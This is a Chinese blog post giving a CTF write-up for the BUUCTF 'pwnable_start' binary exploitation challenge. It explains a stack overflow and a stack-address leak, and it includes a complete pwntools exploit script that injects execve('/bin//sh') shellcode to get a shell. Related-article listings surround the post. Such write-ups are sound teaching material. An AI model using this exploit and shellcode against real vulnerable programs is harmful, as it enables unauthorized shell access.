BUUCTF--pwnable_start1

最新推荐文章于 2024-07-03 16:17:13 发布
最新推荐文章于 2024-07-03 16:17:13 发布
阅读量369 收藏 11
点赞数 7
分类专栏: pwn CTF 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135429215
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

查看保护:

32位程序保护全没开,黑盒测试下效果:

存在栈溢出,那么这题的想法就是直接ret2shellcode了。IDA中看看具体流程:

出奇的少,这题不能看反汇编的代码,直接去看汇编:

主要就2个功能,通过系统调用来执行读写功能,将字符串Let's start the CTF:输出,然后接收用户输入。我们看到注释下标注了长度为0x14。也就是我们能刚好覆盖到返回地址,但是我的shellcode有0x18个字节。根本不够执行完全部,而且目前没有有用的信息来让我ret2stack。因此我们要去调试看看能不能利用什么信息:

我们观察在代码的最开始,会将一个esp压入栈中,紧接着栈的布局将变成如此:

5个a是我输入的测试数据。ecx将和esp将指向用户输入数据的起始位置。此时esp要索引到返回地址,将直接执行add esp,14h。执行完后esp将指向旧的esp:

而且我们惊奇的发现,这两个值相差0x4,因此我们需要通过write函数将他泄露出来,紧着这我们的返回地址就有了,步骤shellocode就是要返回到布局的栈地址处执行。原理我讲明白了,直接上exp:

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
 
io = process('./start')
#io = remote('node5.buuoj.cn',28971)
gdb.attach(io)
io.recv()
mov_ecx_esp = 0x8048087
payload1 = b'a'*0x14 + p32(mov_ecx_esp)
io.send(payload1)

leak_stack_addr = u32(io.recv(4))
cur_esp = leak_stack_addr+0x14
print(hex(leak_stack_addr))
payload2 = b'a'*0x14 + p32(cur_esp)
shellcode ='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xb
int 0x80                
'''

shellcode=asm(shellcode)

print(len(shellcode))
payload2 += shellcode
io.send(payload2)
pause()
#gdb.attach(io)
io.interactive()

call就不要ret
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4158
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
FM350-1_Getting_Start
03-16
FM350-1_Getting_Start.pdf 介绍了关于FM350-1_Getting_Start的详细说明,提供S7-300的技术资料的下载。
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 217
BUUCTF:pwnable_start题解
关于BUUCTF之“pwnable_start”的一点小结
Probeginner的博客
12-07 293
之前这个用汇编代码编写shellcode的题目做的较少,这题算是开端。 正常检查程序保护,啥也没开。 我们先分析一波程序: 需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。 我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址 .
BUUCTF pwnable_start
qq_63528163的博客
09-04 121
题解
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1144
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 773
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
[BUUCTF-pwn] pwnable_secret_garden
weixin_52640415的博客
11-26 633
这个题本身没有难度,小难点在one_gadget+realloc偏移 堆题全保护就不用说了,漏洞在free时没有删指针 int m3free() { int result; // eax _DWORD *v1; // rax unsigned int v2; // [rsp+4h] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+8h] [rbp-10h] v3 = __readfsqword(0x28u); if ( !unk_20
PWN-PRACTICE-BUUCTF-15
P1umH0的博客
08-09 131
PWN-PRACTICE-BUUCTF-15axb_2019_fmt32wustctf2020_getshell_2others_babystackpwnable_start axb_2019_fmt32 格式化字符串漏洞 第一次打印出printf的真实地址,进而计算libc基地址,得到system真实地址 第二次修改got表,使printf的got指向system的真实地址,后面执行printf时实际上是执行system from pwn import * #p=process('./axb_2019_f
PWN练习---Stack_1
qq_74259765的博客
06-25 1278
ctf--PWN方向一些做题经历wp
Infineon-XMC1000-C_Start_and_Device_Initialization-AN-v01_00-EN启动文件说明.pdf
09-01
介绍了DAVE环境下XMC1000的启动文件;本应用文档是英飞凌官方提供的介绍XMC1000的启动过程和器件初始化的文档;对英飞凌单片机器件底层驱动文件提供了更深刻的了解!
Nu-Link_USB_Driver 1.3
05-23
5. NUC1xx Quick Start Guide for Keil uVision4.pdf Quick start for Keil uVision4 (English version) 4. NUC1xx 开发环境 - Keil uVision4 快速上手.pdf Quick start for Keil uVision4 (Chinese version)
113172231mimo-simulate-GUI.rar_ui_start
07-15
通过键入“ui_start”从命令行调用GUI。 GUI是自我解释的。 工具提示以蓝色给出。 光标需要在这些位置上进行详细说明。 主要文件是“runsim.m”。建议使用10000次运行(数据包)来绘制帧错误率,对于BER / SER使用...
grafana-6.6.2-1.x86_64.rpm
03-16
官网下载最新版本、功能出色 1. sudo yum install grafana-6.6.2-1.x86_64.rpm 2. service grafana-server start 3. 默认3000端口
新型开发语言的试用感受-仓颉语言发布之际
opendba的专栏
07-03 1170
Zig、Odin、Mojo、codon、carbon、nim等语言的使用感受
OpenHarmony移植小型系统EXYNOS4412 linux内核build配置
07-07
OpenHarmony移植小型系统EXYNOS4412 linux内核build相关的配置
ROS安装配置与语法simulation-robot.launch
最新发布
07-08
ROS安装配置与语法simulation_robot.launch
Java软件开发实战 Java基础与案例开发详解 14-1 图形用户界面设计 共15页.pdf
07-07
完整版:https://download.csdn.net/download/qq_27595745/89522468 【课程大纲】 1-1 什么是java 1-2 认识java语言 1-3 java平台的体系结构 1-4 java SE环境安装和配置 2-1 java程序简介 2-2 计算机中的程序 2-3 java程序 2-4 java类库组织结构和文档 2-5 java虚拟机简介 2-6 java的垃圾回收器 2-7 java上机练习 3-1 java语言基础入门 3-2 数据的分类 3-3 标识符、关键字和常量 3-4 运算符 3-5 表达式 3-6 顺序结构和选择结构 3-7 循环语句 3-8 跳转语句 3-9 MyEclipse工具介绍 3-10 java基础知识章节练习 4-1 一维数组 4-2 数组应用 4-3 多维数组 4-4 排序算法 4-5 增强for循环 4-6 数组和排序算法章节练习 5-0 抽象和封装 5-1 面向过程的设计思想 5-2 面向对象的设计思想 5-3 抽象 5-4 封装 5-5 属性 5-6 方法的定义 5-7 this关键字 5-8 javaBean 5-9 包 package 5-10 抽象和封装章节练习 6-0 继承和多态 6-1 继承 6-2 object类 6-3 多态 6-4 访问修饰符 6-5 static修饰符 6-6 final修饰符 6-7 abstract修饰符 6-8 接口 6-9 继承和多态 章节练习 7-1 面向对象的分析与设计简介 7-2 对象模型建立 7-3 类之间的关系 7-4 软件的可维护与复用设计原则 7-5 面向对象的设计与分析 章节练习 8-1 内部类与包装器 8-2 对象包装器 8-3 装箱和拆箱 8-4 练习题 9-1 常用类介绍 9-2 StringBuffer和String Builder类 9-3 Rintime类的使用 9-4 日期类简介 9-5 java程序国际化的实现 9-6 Random类和Math类 9-7 枚举 9-8 练习题 10-1 java异常处理 10-2 认识异常 10-3 使用try和catch捕获异常 10-4 使用throw和throws引发异常 10-5 finally关键字 10-6 getMessage和printStackTrace方法 10-7 异常分类 10-8 自定义异常类 10-9 练习题 11-1 Java集合框架和泛型机制 11-2 Collection接口 11-3 Set接口实现类 11-4 List接口实现类 11-5 Map接口 11-6 Collections类 11-7 泛型概述 11-8 练习题 12-1 多线程 12-2 线程的生命周期 12-3 线程的调度和优先级 12-4 线程的同步 12-5 集合类的同步问题 12-6 用Timer类调度任务 12-7 练习题 13-1 Java IO 13-2 Java IO原理 13-3 流类的结构 13-4 文件流 13-5 缓冲流 13-6 转换流 13-7 数据流 13-8 打印流 13-9 对象流 13-10 随机存取文件流 13-11 zip文件流 13-12 练习题 14-1 图形用户界面设计 14-2 事件处理机制 14-3 AWT常用组件 14-4 swing简介 14-5 可视化开发swing组件 14-6 声音的播放和处理 14-7 2D图形的绘制 14-8 练习题 15-1 反射 15-2 使用Java反射机制 15-3 反射与动态代理 15-4 练习题 16-1 Java标注 16-2 JDK内置的基本标注类型 16-3 自定义标注类型 16-4 对标注进行标注 16-5 利用反射获取标注信息 16-6 练习题 17-1 顶目实战1-单机版五子棋游戏 17-2 总体设计 17-3 代码实现 17-4 程序的运行与发布 17-5 手动生成可执行JAR文件 17-6 练习题 18-1 Java数据库编程 18-2 JDBC类和接口 18-3 JDBC操作SQL 18-4 JDBC基本示例 18-5 JDBC应用示例 18-6 练习题 19-1 。。。
-param:JOB_NAME=job_ads_fin_wip_account_allot_d -param:ETL_FILE=/19_ADS_FIN/ETL/job_ads_fin_wip_account_allot_d.kjb -param:MIN_START_DATE=20230701 -param:MIN_END_DATE=20230702 -param:MAX_START_DATE=20230709 -param:MAX_END_DATE=20230710 -param:INCR_STEP=1M
07-11
这看起来像是一组作业参数的设置。这些参数用于指定一个名为"job_ads_fin_wip_account_...- INCR_STEP:增量步长,设定为"1M"。 这些参数可能会在作业执行过程中被使用,用于指定作业的输入、输出、日期范围等信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值